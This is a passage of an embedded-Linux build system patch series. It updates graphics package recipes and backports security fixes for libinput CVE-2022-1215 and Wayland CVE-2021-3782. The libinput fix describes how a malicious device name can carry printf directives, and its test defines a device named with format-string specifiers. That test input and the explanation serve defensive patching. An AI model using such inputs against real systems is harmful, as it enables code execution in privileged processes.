file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \
"
diff --git a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
index c94e768b52..b212814759 100644
--- a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
@@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \
SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf"
SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd"
-SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \
- git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \
- git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \
+SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \
+ git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \
+ git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \
file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \
"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
index 72c29a72a2..c58a801e03 100644
--- a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
@@ -1,11 +1,15 @@
SUMMARY = "Vulkan Header files and API registry"
+DESCRIPTION = "Vulkan is a 3D graphics and compute API providing cross-platform access \
+to modern GPUs with low overhead and targeting realtime graphics applications such as \
+games and interactive media. This package contains the development headers \
+for packages wanting to make use of Vulkan."
HOMEPAGE = "https://www.khronos.org/vulkan/"
BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers"
SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84"
diff --git a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
index 504cf85a2b..c8352bf31d 100644
--- a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
index 2fd61c989a..ec65f11952 100644
--- a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
@@ -1,11 +1,12 @@
SUMMARY = "Vulkan Utilities and Tools"
+DESCRIPTION = "Assist development by enabling developers to verify their applications correct use of the Vulkan API."
HOMEPAGE = "https://www.khronos.org/vulkan/"
BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools"
SECTION = "libs"
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
-SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126"
+SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https"
SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
index a620295978..f0dc780ca1 100644
--- a/meta/recipes-graphics/waffle/waffle_1.6.0.bb
+++ b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
@@ -1,13 +1,21 @@
-SUMMARY = "cross-platform C library to defer selection of GL API and of window system"
+SUMMARY = "A C library for selecting an OpenGL API and window system at runtime"
+DESCRIPTION = "A cross-platform C library that allows one to defer selection \
+of an OpenGL API and window system until runtime. For example, on Linux, Waffle \
+enables an application to select X11/EGL with an OpenGL 3.3 core profile, \
+Wayland with OpenGL ES2, and other window system / API combinations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \
file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf"
-SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz"
-SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7"
-SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7"
+SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2"
+SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942"
+SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb"
-UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html"
+S = "${WORKDIR}/${BPN}-v${PV}"
+
+UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases"
inherit meson features_check lib_package bash-completion
diff --git a/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
new file mode 100644
index 0000000000..313c0c5eb2
--- /dev/null
+++ b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
@@ -0,0 +1,360 @@
+From 2a8b8fde90d63d48ce09ddae44142674bbca1c28 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Mar 2022 09:25:22 +1000
+Subject: [PATCH] evdev: strip the device name of format directives
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes a format string vulnerabilty.
+
+evdev_log_message() composes a format string consisting of a fixed
+prefix (including the rendered device name) and the passed-in format
+buffer. This format string is then passed with the arguments to the
+actual log handler, which usually and eventually ends up being printf.
+
+If the device name contains a printf-style format directive, these ended
+up in the format string and thus get interpreted correctly, e.g. for a
+device "Foo%sBar" the log message vs printf invocation ends up being:
+ evdev_log_message(device, "some message %s", "some argument");
+ printf("event9 - Foo%sBar: some message %s", "some argument");
+
+This can enable an attacker to execute malicious code with the
+privileges of the process using libinput.
+
+To exploit this, an attacker needs to be able to create a kernel device
+with a malicious name, e.g. through /dev/uinput or a Bluetooth device.
+
+To fix this, convert any potential format directives in the device name
+by duplicating percentages.
+
+Pre-rendering the device to avoid the issue altogether would be nicer
+but the current log level hooks do not easily allow for this. The device
+name is the only user-controlled part of the format string.
+
+A second potential issue is the sysname of the device which is also
+sanitized.
+
+This issue was found by Albin Eldstål-Ahrens and Benjamin Svensson from
+Assured AB, and independently by Lukas Lamster.
+
+Fixes #752
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+(cherry picked from commit a423d7d3269dc32a87384f79e29bb5ac021c83d1)
+
+CVE: CVE-2022-1215
+Upstream Status: Backport [https://gitlab.freedesktop.org/libinput/libinput/-/commit/2a8b8fde90d63d48ce09ddae44142674bbca1c28]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ meson.build | 1 +
+ src/evdev.c | 31 +++++++++++------
+ src/evdev.h | 6 ++--
+ src/util-strings.h | 30 ++++++++++++++++
+ test/litest-device-format-string.c | 56 ++++++++++++++++++++++++++++++
+ test/litest.h | 1 +
+ test/test-utils.c | 26 ++++++++++++++
+ 7 files changed, 139 insertions(+), 12 deletions(-)
+ create mode 100644 test/litest-device-format-string.c
+
+diff --git a/meson.build b/meson.build
+index 90f528e6..1f6159e7 100644
+--- a/meson.build
++++ b/meson.build
+@@ -787,6 +787,7 @@
+ 'test/litest-device-dell-canvas-totem-touch.c',
+ 'test/litest-device-elantech-touchpad.c',
+ 'test/litest-device-elan-tablet.c',
++ 'test/litest-device-format-string.c',
+ 'test/litest-device-generic-singletouch.c',
+ 'test/litest-device-gpio-keys.c',
+ 'test/litest-device-huion-pentablet.c',
+diff --git a/src/evdev.c b/src/evdev.c
+index 6d81f58f..d1c35c07 100644
+--- a/src/evdev.c
++++ b/src/evdev.c
+@@ -2356,19 +2356,19 @@ evdev_device_create(struct libinput_seat *seat,
+ struct libinput *libinput = seat->libinput;
+ struct evdev_device *device = NULL;
+ int rc;
+- int fd;
++ int fd = -1;
+ int unhandled_device = 0;
+ const char *devnode = udev_device_get_devnode(udev_device);
+- const char *sysname = udev_device_get_sysname(udev_device);
++ char *sysname = str_sanitize(udev_device_get_sysname(udev_device));
+
+ if (!devnode) {
+ log_info(libinput, "%s: no device node associated\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ if (udev_device_should_be_ignored(udev_device)) {
+ log_debug(libinput, "%s: device is ignored\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ /* Use non-blocking mode so that we can loop on read on
+@@ -2382,13 +2382,15 @@ evdev_device_create(struct libinput_seat *seat,
+ sysname,
+ devnode,
+ strerror(-fd));
+- return NULL;
++ goto err;
+ }
+
+ if (!evdev_device_have_same_syspath(udev_device, fd))
+ goto err;
+
+ device = zalloc(sizeof *device);
++ device->sysname = sysname;
++ sysname = NULL;
+
+ libinput_device_init(&device->base, seat);
+ libinput_seat_ref(seat);
+@@ -2411,6 +2413,9 @@ evdev_device_create(struct libinput_seat *seat,
+ device->dispatch = NULL;
+ device->fd = fd;
+ device->devname = libevdev_get_name(device->evdev);
++ /* the log_prefix_name is used as part of a printf format string and
++ * must not contain % directives, see evdev_log_msg */
++ device->log_prefix_name = str_sanitize(device->devname);
+ device->scroll.threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction_lock_threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction = 0;
+@@ -2238,9 +2238,14 @@
+ return device;
+
+ err:
+- close_restricted(libinput, fd);
+- if (device)
+- evdev_device_destroy(device);
++ if (fd >= 0) {
++ close_restricted(libinput, fd);
++ if (device) {
++ unhandled_device = device->seat_caps == 0;
++ evdev_device_destroy(device);
++ }
++ }
++ free(sysname);
+
+ return unhandled_device ? EVDEV_UNHANDLED_DEVICE : NULL;
+ }
+@@ -2469,7 +2478,7 @@ evdev_device_get_output(struct evdev_device *device)
+ const char *
+ evdev_device_get_sysname(struct evdev_device *device)
+ {
+- return udev_device_get_sysname(device->udev_device);
++ return device->sysname;
+ }
+
+ const char *
+@@ -3066,6 +3075,8 @@ evdev_device_destroy(struct evdev_device *device)
+ if (device->base.group)
+ libinput_device_group_unref(device->base.group);
+
++ free(device->log_prefix_name);
++ free(device->sysname);
+ free(device->output_name);
+ filter_destroy(device->pointer.filter);
+ libinput_timer_destroy(&device->scroll.timer);
+diff --git a/src/evdev.h b/src/evdev.h
+index c7d130f8..980c5943 100644
+--- a/src/evdev.h
++++ b/src/evdev.h
+@@ -169,6 +169,8 @@ struct evdev_device {
+ struct udev_device *udev_device;
+ char *output_name;
+ const char *devname;
++ char *log_prefix_name;
++ char *sysname;
+ bool was_removed;
+ int fd;
+ enum evdev_device_seat_capability seat_caps;
+@@ -786,7 +788,7 @@ evdev_log_msg(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+@@ -824,7 +826,7 @@ evdev_log_msg_ratelimit(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+diff --git a/src/util-strings.h b/src/util-strings.h
+index 2a15fab3..d5a84146 100644
+--- a/src/util-strings.h
++++ b/src/util-strings.h
+@@ -42,6 +42,7 @@
+ #ifdef HAVE_XLOCALE_H
+ #include <xlocale.h>
+ #endif
++#include "util-macros.h"
+
+ #define streq(s1, s2) (strcmp((s1), (s2)) == 0)
+ #define strneq(s1, s2, n) (strncmp((s1), (s2), (n)) == 0)
+@@ -312,3 +313,31 @@
+ free(result);
+ return -1;
+ }
++
++/**
++ * Return a copy of str with all % converted to %% to make the string
++ * acceptable as printf format.
++ */
++static inline char *
++str_sanitize(const char *str)
++{
++ if (!str)
++ return NULL;
++
++ if (!strchr(str, '%'))
++ return strdup(str);
++
++ size_t slen = min(strlen(str), 512);
++ char *sanitized = zalloc(2 * slen + 1);
++ const char *src = str;
++ char *dst = sanitized;
++
++ for (size_t i = 0; i < slen; i++) {
++ if (*src == '%')
++ *dst++ = '%';
++ *dst++ = *src++;
++ }
++ *dst = '\0';
++
++ return sanitized;
++}
+diff --git a/test/litest-device-format-string.c b/test/litest-device-format-string.c
+new file mode 100644
+index 00000000..aed15db4
+--- /dev/null
++++ b/test/litest-device-format-string.c
+@@ -0,0 +1,56 @@
++
++/*
++ * Copyright © 2013 Red Hat, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice (including the next
++ * paragraph) shall be included in all copies or substantial portions of the
++ * Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
++ * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
++ * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
++ * DEALINGS IN THE SOFTWARE.
++ */
++
++#include "config.h"
++
++#include "litest.h"
++#include "litest-int.h"
++
++static struct input_id input_id = {
++ .bustype = 0x3,
++ .vendor = 0x0123,
++ .product = 0x0456,
++};
++
++static int events[] = {
++ EV_KEY, BTN_LEFT,
++ EV_KEY, BTN_RIGHT,
++ EV_KEY, BTN_MIDDLE,
++ EV_REL, REL_X,
++ EV_REL, REL_Y,
++ EV_REL, REL_WHEEL,
++ EV_REL, REL_WHEEL_HI_RES,
++ -1 , -1,
++};
++
++TEST_DEVICE("mouse-format-string",
++ .type = LITEST_MOUSE_FORMAT_STRING,
++ .features = LITEST_RELATIVE | LITEST_BUTTON | LITEST_WHEEL,
++ .interface = NULL,
++
++ .name = "Evil %s %d %x Mouse %p %",
++ .id = &input_id,
++ .absinfo = NULL,
++ .events = events,
++)
+diff --git a/test/litest.h b/test/litest.h
+index 4982e516..1b1daa90 100644
+--- a/test/litest.h
++++ b/test/litest.h
+@@ -303,6 +303,7 @@
+ LITEST_ALPS_3FG,
+ LITEST_ELAN_TABLET,
+ LITEST_ABSINFO_OVERRIDE,
++ LITEST_MOUSE_FORMAT_STRING,
+ };
+
+ #define LITEST_DEVICELESS -2
+diff --git a/test/test-utils.c b/test/test-utils.c
+index 989adecd..e80754be 100644
+--- a/test/test-utils.c
++++ b/test/test-utils.c
+@@ -1267,6 +1267,31 @@ START_TEST(strstartswith_test)
+ }
+ END_TEST
+
++START_TEST(strsanitize_test)
++{
++ struct strsanitize_test {
++ const char *string;
++ const char *expected;
++ } tests[] = {
++ { "foobar", "foobar" },
++ { "", "" },
++ { "%", "%%" },
++ { "%%%%", "%%%%%%%%" },
++ { "x %s", "x %%s" },
++ { "x %", "x %%" },
++ { "%sx", "%%sx" },
++ { "%s%s", "%%s%%s" },
++ { NULL, NULL },
++ };
++
++ for (struct strsanitize_test *t = tests; t->string; t++) {
++ char *sanitized = str_sanitize(t->string);
++ ck_assert_str_eq(sanitized, t->expected);
++ free(sanitized);
++ }
++}
++END_TEST
++
+ START_TEST(list_test_insert)
+ {
+ struct list_test {
+@@ -1138,6 +1138,7 @@
+ tcase_add_test(tc, strsplit_test);
+ tcase_add_test(tc, kvsplit_double_test);
+ tcase_add_test(tc, strjoin_test);
++ tcase_add_test(tc, strsanitize_test);
+ tcase_add_test(tc, time_conversion);
+
+ tcase_add_test(tc, list_test_insert);
+
+--
+GitLab
+
diff --git a/meta/recipes-graphics/wayland/libinput_1.15.2.bb b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
index 810532774e..d7927d132a 100644
--- a/meta/recipes-graphics/wayland/libinput_1.15.2.bb
+++ b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
@@ -14,6 +14,7 @@ DEPENDS = "libevdev udev mtdev"
SRC_URI = "http://www.freedesktop.org/software/${BPN}/${BP}.tar.xz \
file://determinism.patch \
+ file://CVE-2022-1215.patch \
"
SRC_URI[md5sum] = "eb6bd2907ad33d53954d70dfb881a643"
SRC_URI[sha256sum] = "971c3fbfb624f95c911adeb2803c372e4e3647d1b98f278f660051f834597747"
diff --git a/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
new file mode 100644
index 0000000000..df204508e9
--- /dev/null
+++ b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
@@ -0,0 +1,111 @@
+From 5eed6609619cc2e4eaa8618d11c15d442abf54be Mon Sep 17 00:00:00 2001
+From: Derek Foreman <derek.foreman@collabora.com>
+Date: Fri, 28 Jan 2022 13:18:37 -0600
+Subject: [PATCH] util: Limit size of wl_map
+
+Since server IDs are basically indistinguishable from really big client
+IDs at many points in the source, it's theoretically possible to overflow
+a map and either overflow server IDs into the client ID space, or grow
+client IDs into the server ID space. This would currently take a massive
+amount of RAM, but the definition of massive changes yearly.
+
+Prevent this by placing a ridiculous but arbitrary upper bound on the
+number of items we can put in a map: 0xF00000, somewhere over 15 million.
+This should satisfy pathological clients without restriction, but stays
+well clear of the 0xFF000000 transition point between server and client
+IDs. It will still take an improbable amount of RAM to hit this, and a
+client could still exhaust all RAM in this way, but our goal is to prevent
+overflow and undefined behaviour.
+
+Fixes #224
+
+Signed-off-by: Derek Foreman <derek.foreman@collabora.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3782
+
+Reference to upstream patch:
+https://gitlab.freedesktop.org/wayland/wayland/-/commit/b19488c7154b902354cb26a27f11415d7799b0b2
+
+[DP: adjust context for wayland version 1.20.0]
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ src/wayland-private.h | 1 +
+ src/wayland-util.c | 25 +++++++++++++++++++++++--
+ 2 files changed, 24 insertions(+), 2 deletions(-)
+
+diff --git a/src/wayland-private.h b/src/wayland-private.h
+index 9bf8cb7..35dc40e 100644
+--- a/src/wayland-private.h
++++ b/src/wayland-private.h
+@@ -45,6 +45,7 @@
+ #define WL_MAP_SERVER_SIDE 0
+ #define WL_MAP_CLIENT_SIDE 1
+ #define WL_SERVER_ID_START 0xff000000
++#define WL_MAP_MAX_OBJECTS 0x00f00000
+ #define WL_CLOSURE_MAX_ARGS 20
+
+ struct wl_object {
+diff --git a/src/wayland-util.c b/src/wayland-util.c
+index d5973bf..3e45d19 100644
+--- a/src/wayland-util.c
++++ b/src/wayland-util.c
+@@ -195,6 +195,7 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ union map_entry *start, *entry;
+ struct wl_array *entries;
+ uint32_t base;
++ uint32_t count;
+
+ if (map->side == WL_MAP_CLIENT_SIDE) {
+ entries = &map->client_entries;
+@@ -215,10 +216,25 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ start = entries->data;
+ }
+
++ /* wl_array only grows, so if we have too many objects at
++ * this point there's no way to clean up. We could be more
++ * pro-active about trying to avoid this allocation, but
++ * it doesn't really matter because at this point there is
++ * nothing to be done but disconnect the client and delete
++ * the whole array either way.
++ */
++ count = entry - start;
++ if (count > WL_MAP_MAX_OBJECTS) {
++ /* entry->data is freshly malloced garbage, so we'd
++ * better make it a NULL so wl_map_for_each doesn't
++ * dereference it later. */
++ entry->data = NULL;
++ return 0;
++ }
+ entry->data = data;
+ entry->next |= (flags & 0x1) << 1;
+
+- return (entry - start) + base;
++ return count + base;
+ }
+
+ int
+@@ -235,6 +251,9 @@ wl_map_insert_at(struct wl_map *map, uint32_t flags, uint32_t i, void *data)
+ i -= WL_SERVER_ID_START;
+ }
+
++ if (i > WL_MAP_MAX_OBJECTS)
++ return -1;
++
+ count = entries->size / sizeof *start;
+ if (count < i)
+ return -1;
+@@ -269,8 +288,10 @@ wl_map_reserve_new(struct wl_map *map, uint32_t i)
+ i -= WL_SERVER_ID_START;
+ }
+
+- count = entries->size / sizeof *start;
++ if (i > WL_MAP_MAX_OBJECTS)
++ return -1;
+
++ count = entries->size / sizeof *start;
+ if (count < i)
+ return -1;
+
+--
+2.37.3
diff --git a/meta/recipes-graphics/wayland/wayland_1.18.0.bb b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
index 00be3aac27..e621abddbf 100644
--- a/meta/recipes-graphics/wayland/wayland_1.18.0.bb
+++ b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
@@ -18,6 +18,7 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
file://0002-Do-not-hardcode-the-path-to-wayland-scanner.patch \
file://0001-build-Fix-strndup-detection-on-MinGW.patch \
file://0001-meson-tests-add-missing-dependencies-on-protocol-hea.patch \
+ file://CVE-2021-3782.patch \
"
SRC_URI[md5sum] = "23317697b6e3ff2e1ac8c5ba3ed57b65"
SRC_URI[sha256sum] = "4675a79f091020817a98fd0484e7208c8762242266967f55a67776936c2e294d"
diff --git a/meta/recipes-graphics/wayland/weston-init/weston.ini b/meta/recipes-graphics/wayland/weston-init/weston.ini
index 1e6dff68fd..40c5195887 100644
--- a/meta/recipes-graphics/wayland/weston-init/weston.ini
+++ b/meta/recipes-graphics/wayland/weston-init/weston.ini
@@ -42,7 +42,7 @@ require-input=false
#path=/build/weston-0lEgCh/weston-1.11.0/weston-flower
#[input-method]
-#path=/usr/lib/weston/weston-keyboard
+#path=/usr/libexec/weston-keyboard
#[output]
#name=LVDS1
diff --git a/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
new file mode 100644
index 0000000000..fb36d3817a
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
@@ -0,0 +1,32 @@
+From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 20:03:49 +0200
+Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg
+ top-level surface
+
+The shsurf is calloc'ed so the surface count is always 0. Not only
+that but the surface is not set as active by default, so there's no
+need to de-activate it.
+
+Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 442a625f..3791be25 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface,
+ wl_list_init(&shsurf->children_link);
+
+ weston_desktop_surface_set_user_data(desktop_surface, shsurf);
+- weston_desktop_surface_set_activated(desktop_surface,
+- shsurf->focus_count > 0);
+ }
+
+ static void
+--
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
new file mode 100644
index 0000000000..dcd0700fca
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
@@ -0,0 +1,57 @@
+From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:40:22 +0200
+Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to
+ activate/de-activate
+
+This way it better reflects that it handles activation rather that input
+focus.
+
+Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 3791be25..c4669f11 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data)
+ }
+
+ static void
+-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_deactivate(struct shell_surface *shsurf)
+ {
+ if (--shsurf->focus_count == 0)
+ weston_desktop_surface_set_activated(shsurf->desktop_surface, false);
+ }
+
+ static void
+-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_activate(struct shell_surface *shsurf)
+ {
+ if (shsurf->focus_count++ == 0)
+ weston_desktop_surface_set_activated(shsurf->desktop_surface, true);
+@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ if (seat->focused_surface) {
+ struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ if (shsurf)
+- shell_surface_lose_keyboard_focus(shsurf);
++ shell_surface_deactivate(shsurf);
+ }
+
+ seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ if (seat->focused_surface) {
+ struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ if (shsurf)
+- shell_surface_gain_keyboard_focus(shsurf);
++ shell_surface_activate(shsurf);
+ }
+ }
+
+--
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
new file mode 100644
index 0000000000..7ca72f8494
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
@@ -0,0 +1,99 @@
+From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:44:26 +0200
+Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when
+ activating
+
+We shouldn't be constrained by having a keyboard plugged-in, so avoid
+activating/de-activating the window/surface in the keyboard focus
+handler and embed it straight into the window activation part.
+
+Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 41 +++++++++++++++++++++++++----------------
+ 1 file changed, 25 insertions(+), 16 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index c4669f11..c6a4fe91 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf)
+ static void
+ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ {
+- struct weston_keyboard *keyboard = data;
+- struct shell_seat *seat = get_shell_seat(keyboard->seat);
+-
+- if (seat->focused_surface) {
+- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+- if (shsurf)
+- shell_surface_deactivate(shsurf);
+- }
+-
+- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+-
+- if (seat->focused_surface) {
